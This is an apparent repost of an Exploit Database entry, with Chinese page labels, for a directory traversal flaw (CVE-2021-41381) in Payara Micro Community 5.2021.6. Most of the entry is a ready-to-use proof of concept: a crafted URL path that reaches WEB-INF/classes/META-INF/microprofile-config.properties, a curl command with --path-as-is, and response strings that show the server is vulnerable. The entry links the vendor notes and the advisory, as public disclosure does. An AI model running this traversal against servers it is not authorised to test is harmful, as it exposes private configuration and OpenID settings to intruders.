Payara Micro Community 5.2021.6 – Directory Traversal

• Exploit Database
• 121 阅读

• 作者： Yasser Khan
  日期： 2021-10-04
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/50371/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36

  # Exploit Title: Payara Micro Community 5.2021.6 - Directory Traversal # Date: 01/10/2021 # Exploit Author: Yasser Khan (N3T_hunt3r) # Vendor Homepage: https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html # Software Link: https://www.payara.fish/downloads/payara-platform-community-edition/#x # Version: Payara Micro Community 5.2021.6 # Tested on: Linux/Windows OS # CVE : CVE-2021-41381   https://nvd.nist.gov/vuln/detail/CVE-2021-41381   Proof of Concept:   Step1: Open the browser check the version of the payara software   Step2: Add this Path at end of the URL /.//WEB-INF/classes/META-INF/microprofile-config.properties   Step3: Check the response with match containing "payara.security.openid.default.providerURI="   "payara.security.openid.sessionScopedConfiguration=true"   Step4 : If any of these contents in the response then the application is vulnerable to Directory Traversal Vulnerability.   Step5: Alternatively we can use CURL by using this command:   Request: curl --path-as-is http://localhost:8080/.//WEB-INF/classes/META-INF/microprofile-config.properties   Reference:   https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html https://nvd.nist.gov/vuln/detail/CVE-2021-41381